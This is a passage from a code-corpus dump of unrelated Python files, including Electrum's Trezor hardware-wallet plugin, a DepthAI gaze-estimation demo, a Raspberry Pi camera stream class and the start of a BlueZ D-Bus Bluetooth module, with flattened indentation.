frame.set_filter('dot')
frame.Show()
if args.enable_auto_focus:
frame.toggle_auto_focus(None)
app.MainLoop()
if __name__ == '__main__':
rospy.init_node('smach_viewer',anonymous=False, disable_signals=True,log_level=rospy.INFO)
sys.argv = rospy.myargv()
main()
|
trezor.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, versiontuple, UserCancelled
from electrum.bitcoin import (xpub_from_pubkey, deserialize_xpub,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum import constants
from electrum.i18n import _
from electrum.plugin import BasePlugin, Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = 'TREZOR'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 9, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import trezorlib.messages
self.client_class = client.TrezorClient
self.types = trezorlib.messages
self.DEVICE_IDS = ('TREZOR',)
self.transport_handler = transport.TrezorTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
return trezorlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]
def create_client(self, device, handler):
try:
self.print_error("connecting to device at", device.path)
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.print_error("cannot connect at", device.path, str(e))
return None
if not transport:
self.print_error("cannot connect at", device.path)
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise Exception(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
model = client.get_trezor_model()
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, model)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection, recovery_type = settings
if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
else:
recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language,
type=recovery_type_trezor)
if recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
_, depth, fingerprint, child_num, chain_code, key = deserialize_xpub(xpub)
node = self.types.HDNodeType(
depth=depth,
fingerprint=int.from_bytes(fingerprint, 'big'),
child_num=int.from_bytes(child_num, 'big'),
chain_code=chain_code,
public_key=key,
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise Exception(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_trezor_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
BallTrackerStub.py | # BallTrackerStub
# Singleton class for keeping an observable coordinates of a ball, found via camera input
import time
import random
import threading
class BallTracker:
# Singleton instance
instance = None
@staticmethod
def get_instance():
if BallTracker.instance is None:
BallTracker.instance = BallTracker()
return BallTracker.instance
def __init__(self):
self.observers = []
def start_ball_tracking(self):
print("Psudo ball tracking started.")
t2 = threading.Thread(target=self.ball_tracking())
t2.daemon = True
t2.start()
def ball_tracking(self):
while True:
self.push_notification("Location Updated:",
x=random.random(),
y=random.random())
time.sleep(1)
def stop_ball_tracking(self):
self.ballTrackingEnabled = False
# Observer Functions
def register(self, observer):
if observer not in self.observers:
self.observers.append(observer)
def unregister(self, observer):
if observer in self.observers:
self.observers.remove(observer)
def unregister_all(self):
if self.observers:
del self.observers[:]
def push_notification(self, *args, **keywordargs):
for observer in self.observers:
observer.notify(*args, **keywordargs)
|
main.py | import argparse
import queue
import threading
import signal
from pathlib import Path
import blobconverter
import cv2
import depthai
import numpy as np
from imutils.video import FPS
from math import cos, sin
parser = argparse.ArgumentParser()
parser.add_argument('-nd', '--no-debug', action="store_true", help="Prevent debug output")
parser.add_argument('-cam', '--camera', action="store_true", help="Use DepthAI 4K RGB camera for inference (conflicts with -vid)")
parser.add_argument('-vid', '--video', type=str, help="Path to video file to be used for inference (conflicts with -cam)")
parser.add_argument('-laz', '--lazer', action="store_true", help="Lazer mode")
args = parser.parse_args()
debug = not args.no_debug
camera = not args.video
if args.camera and args.video:
raise ValueError("Incorrect command line parameters! \"-cam\" cannot be used with \"-vid\"!")
elif args.camera is False and args.video is None:
raise ValueError("Missing inference source! Either use \"-cam\" to run on DepthAI camera or \"-vid <path>\" to run on video file")
def draw_3d_axis(image, head_pose, origin, size=50):
# From https://github.com/openvinotoolkit/open_model_zoo/blob/b1ff98b64a6222cf6b5f3838dc0271422250de95/demos/gaze_estimation_demo/cpp/src/results_marker.cpp#L50
origin_x,origin_y = origin
yaw,pitch, roll = np.array(head_pose)*np.pi / 180
sinY = sin(yaw )
sinP = sin(pitch )
sinR = sin(roll )
cosY = cos(yaw )
cosP = cos(pitch )
cosR = cos(roll )
# X axis (red)
x1 = origin_x + size * (cosR * cosY + sinY * sinP * sinR)
y1 = origin_y + size * cosP * sinR
cv2.line(image, (origin_x, origin_y), (int(x1), int(y1)), (0, 0, 255), 3)
# Y axis (green)
x2 = origin_x + size * (cosR * sinY * sinP + cosY * sinR)
y2 = origin_y - size * cosP * cosR
cv2.line(image, (origin_x, origin_y), (int(x2), int(y2)), (0, 255, 0), 3)
# Z axis (blue)
x3 = origin_x + size * (sinY * cosP)
y3 = origin_y + size * sinP
cv2.line(image, (origin_x, origin_y), (int(x3), int(y3)), (255, 0, 0), 2)
return image
def frame_norm(frame, bbox):
norm_vals = np.full(len(bbox), frame.shape[0])
norm_vals[::2] = frame.shape[1]
return (np.clip(np.array(bbox), 0, 1) * norm_vals).astype(int)
def to_planar(arr: np.ndarray, shape: tuple) -> list:
return [val for channel in cv2.resize(arr, shape).transpose(2, 0, 1) for y_col in channel for val in y_col]
def to_tensor_result(packet):
return {
tensor.name: np.array(packet.getLayerFp16(tensor.name)).reshape(tensor.dims)
for tensor in packet.getRaw().tensors
}
def padded_point(point, padding, frame_shape=None):
if frame_shape is None:
return [
point[0] - padding,
point[1] - padding,
point[0] + padding,
point[1] + padding
]
else:
def norm(val, dim):
return max(0, min(val, dim))
if np.any(point - padding > frame_shape[:2]) or np.any(point + padding < 0):
print(f"Unable to create padded box for point {point} with padding {padding} and frame shape {frame_shape[:2]}")
return None
return [
norm(point[0] - padding, frame_shape[0]),
norm(point[1] - padding, frame_shape[1]),
norm(point[0] + padding, frame_shape[0]),
norm(point[1] + padding, frame_shape[1])
]
def create_pipeline():
print("Creating pipeline...")
pipeline = depthai.Pipeline()
if camera:
print("Creating Color Camera...")
cam = pipeline.create(depthai.node.ColorCamera)
cam.setPreviewSize(300, 300)
cam.setResolution(depthai.ColorCameraProperties.SensorResolution.THE_1080_P)
cam.setInterleaved(False)
cam.setBoardSocket(depthai.CameraBoardSocket.RGB)
cam_xout = pipeline.create(depthai.node.XLinkOut)
cam_xout.setStreamName("cam_out")
cam.preview.link(cam_xout.input)
# NeuralNetwork
print("Creating Face Detection Neural Network...")
face_nn = pipeline.create(depthai.node.NeuralNetwork)
face_nn.setBlobPath(blobconverter.from_zoo(name="face-detection-retail-0004", shaves=4))
if camera:
cam.preview.link(face_nn.input)
else:
face_in = pipeline.create(depthai.node.XLinkIn)
face_in.setStreamName("face_in")
face_in.out.link(face_nn.input)
face_nn_xout = pipeline.create(depthai.node.XLinkOut)
face_nn_xout.setStreamName("face_nn")
face_nn.out.link(face_nn_xout.input)
# NeuralNetwork
print("Creating Landmarks Detection Neural Network...")
land_nn = pipeline.create(depthai.node.NeuralNetwork)
land_nn.setBlobPath(blobconverter.from_zoo(name="landmarks-regression-retail-0009", shaves=4))
land_nn_xin = pipeline.create(depthai.node.XLinkIn)
land_nn_xin.setStreamName("landmark_in")
land_nn_xin.out.link(land_nn.input)
land_nn_xout = pipeline.create(depthai.node.XLinkOut)
land_nn_xout.setStreamName("landmark_nn")
land_nn.out.link(land_nn_xout.input)
# NeuralNetwork
print("Creating Head Pose Neural Network...")
pose_nn = pipeline.create(depthai.node.NeuralNetwork)
pose_nn.setBlobPath(blobconverter.from_zoo(name="head-pose-estimation-adas-0001", shaves=4))
pose_nn_xin = pipeline.create(depthai.node.XLinkIn)
pose_nn_xin.setStreamName("pose_in")
pose_nn_xin.out.link(pose_nn.input)
pose_nn_xout = pipeline.create(depthai.node.XLinkOut)
pose_nn_xout.setStreamName("pose_nn")
pose_nn.out.link(pose_nn_xout.input)
# NeuralNetwork
print("Creating Gaze Estimation Neural Network...")
gaze_nn = pipeline.create(depthai.node.NeuralNetwork)
path = blobconverter.from_zoo("gaze-estimation-adas-0002", shaves=4,
compile_params=['-iop head_pose_angles:FP16,right_eye_image:U8,left_eye_image:U8'],
)
gaze_nn.setBlobPath(path)
gaze_nn_xin = pipeline.create(depthai.node.XLinkIn)
gaze_nn_xin.setStreamName("gaze_in")
gaze_nn_xin.out.link(gaze_nn.input)
gaze_nn_xout = pipeline.create(depthai.node.XLinkOut)
gaze_nn_xout.setStreamName("gaze_nn")
gaze_nn.out.link(gaze_nn_xout.input)
return pipeline
class Main:
def __init__(self, device):
self.device = device
print("Starting pipeline...")
self.device.startPipeline()
if camera:
self.cam_out = self.device.getOutputQueue("cam_out")
else:
self.face_in = self.device.getInputQueue("face_in")
if not camera:
self.cap = cv2.VideoCapture(str(Path(args.video).resolve().absolute()))
self.frame = None
self.face_box_q = queue.Queue()
self.bboxes = []
self.left_bbox = None
self.right_bbox = None
self.nose = None
self.pose = None
self.gaze = None
self.running = True
self.fps = FPS()
self.fps.start()
def face_thread(self):
face_nn = self.device.getOutputQueue("face_nn")
landmark_in = self.device.getInputQueue("landmark_in")
pose_in = self.device.getInputQueue("pose_in")
while self.running:
if self.frame is None:
continue
try:
bboxes = np.array(face_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
bboxes = bboxes.reshape((bboxes.size // 7, 7))
self.bboxes = bboxes[bboxes[:, 2] > 0.7][:, 3:7]
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
det_frame = self.frame[bbox[1]:bbox[3], bbox[0]:bbox[2]]
land_data = depthai.NNData()
land_data.setLayer("0", to_planar(det_frame, (48, 48)))
landmark_in.send(land_data)
pose_data = depthai.NNData()
pose_data.setLayer("data", to_planar(det_frame, (60, 60)))
pose_in.send(pose_data)
self.face_box_q.put(bbox)
def land_pose_thread(self):
landmark_nn = self.device.getOutputQueue(name="landmark_nn", maxSize=1, blocking=False)
pose_nn = self.device.getOutputQueue(name="pose_nn", maxSize=1, blocking=False)
gaze_in = self.device.getInputQueue("gaze_in")
while self.running:
try:
land_in = landmark_nn.get().getFirstLayerFp16()
except RuntimeError as ex:
continue
try:
face_bbox = self.face_box_q.get(block=True, timeout=100)
except queue.Empty:
continue
self.face_box_q.task_done()
left = face_bbox[0]
top = face_bbox[1]
face_frame = self.frame[face_bbox[1]:face_bbox[3], face_bbox[0]:face_bbox[2]]
land_data = frame_norm(face_frame, land_in)
land_data[::2] += left
land_data[1::2] += top
left_bbox = padded_point(land_data[:2], padding=30, frame_shape=self.frame.shape)
if left_bbox is None:
print("Point for left eye is corrupted, skipping nn result...")
continue
self.left_bbox = left_bbox
right_bbox = padded_point(land_data[2:4], padding=30, frame_shape=self.frame.shape)
if right_bbox is None:
print("Point for right eye is corrupted, skipping nn result...")
continue
self.right_bbox = right_bbox
self.nose = land_data[4:6]
left_img = self.frame[self.left_bbox[1]:self.left_bbox[3], self.left_bbox[0]:self.left_bbox[2]]
right_img = self.frame[self.right_bbox[1]:self.right_bbox[3], self.right_bbox[0]:self.right_bbox[2]]
try:
# The output of pose_nn is in YPR format, which is the required sequence input for pose in gaze
# https://docs.openvinotoolkit.org/2020.1/_models_intel_head_pose_estimation_adas_0001_description_head_pose_estimation_adas_0001.html
# https://docs.openvinotoolkit.org/latest/omz_models_model_gaze_estimation_adas_0002.html
# ... three head pose angles – (yaw, pitch, and roll) ...
values = to_tensor_result(pose_nn.get())
self.pose = [
values['angle_y_fc'][0][0],
values['angle_p_fc'][0][0],
values['angle_r_fc'][0][0]
]
except RuntimeError as ex:
continue
gaze_data = depthai.NNData()
gaze_data.setLayer("left_eye_image", to_planar(left_img, (60, 60)))
gaze_data.setLayer("right_eye_image", to_planar(right_img, (60, 60)))
gaze_data.setLayer("head_pose_angles", self.pose)
gaze_in.send(gaze_data)
def gaze_thread(self):
gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
def run(self):
self.threads = [
threading.Thread(target=self.face_thread),
threading.Thread(target=self.land_pose_thread),
threading.Thread(target=self.gaze_thread)
]
for thread in self.threads:
thread.start()
while self.should_run():
try:
read_correctly, new_frame = self.get_frame()
except RuntimeError:
continue
if not read_correctly:
break
self.fps.update()
self.frame = new_frame
self.debug_frame = self.frame.copy()
if not camera:
nn_data = depthai.NNData()
nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
self.face_in.send(nn_data)
if debug: # face
if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
x, y = (self.gaze * 100).astype(int)[:2]
if args.lazer:
beam_img = np.zeros(self.debug_frame.shape, np.uint8)
for t in range(10)[::-2]:
cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
self.debug_frame |= beam_img
else:
cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
if not args.lazer:
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
if self.nose is not None:
cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
if self.left_bbox is not None:
cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
if self.right_bbox is not None:
cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
if self.pose is not None and self.nose is not None:
draw_3d_axis(self.debug_frame, self.pose, self.nose)
if camera:
cv2.imshow("Camera view", self.debug_frame)
else:
aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
break
self.fps.stop()
print("FPS: {:.2f}".format(self.fps.fps()))
if not camera:
self.cap.release()
cv2.destroyAllWindows()
for i in range(1, 5): # https://stackoverflow.com/a/25794701/5494277
cv2.waitKey(1)
self.running = False
with depthai.Device(create_pipeline()) as device:
app = Main(device)
# Register a graceful CTRL+C shutdown
def signal_handler(sig, frame):
app.running = False
signal.signal(signal.SIGINT, signal_handler)
app.run()
for thread in app.threads:
thread.join()
|
PiVideoStream.py | # borrowed from imutils https://github.com/jrosebr1/imutils/blob/master/imutils/video/pivideostream.py
# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=4):
# initialize the camera and stream
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.awb_mode = 'fluorescent'
self.camera.iso = 800
self.camera.exposure_compensation = 25
self.camera.brightness = 65
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
for f in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
|
dbusted.py | """
bluew.dbusted
~~~~~~~~~~~~
This modlule contains an implementation of an EngineBluew class,
using the bluez D-Bus API.
:copyright: (c) 2017 by Ahmed Alsharif.
:license: MIT, see LICENSE for more details.
"""
import logging
import threading
import time
from typing import List, Optional, Callable # pylint: disable=W0611
from dbus.mainloop.glib import DBusGMainLoop
import dbus
from gi.repository import GLib
from bluew.dbusted.interfaces import BluezInterfaceError as IfaceError
from bluew.dbusted.interfaces import (BluezGattCharInterface,
BluezAgentManagerInterface,
BluezObjectInterface,
BluezAdapterInterface,
BluezDeviceInterface,
